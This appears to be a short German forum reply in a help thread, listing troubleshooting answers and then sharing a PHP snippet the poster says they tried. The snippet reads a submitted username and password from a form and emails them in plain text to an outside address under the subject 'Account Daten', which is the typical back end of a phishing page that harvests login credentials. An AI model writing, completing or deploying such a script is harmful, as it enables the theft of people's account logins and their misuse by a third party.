1. ja hab ich
2. hab ich schon 2x
3. hab ich auch schon gemacht und einen weiteren code ausprobiert:
Code:
<?php
  $username = $_POST['username'];
  $password = $_POST['password'];

  $to = "xxxxxx@web.de";
  $subject = "Account Daten";
  $content = "Benutzername: ".$username ."\r\nPasswort: ".$password;
  mail($to, $subject, $content);
?>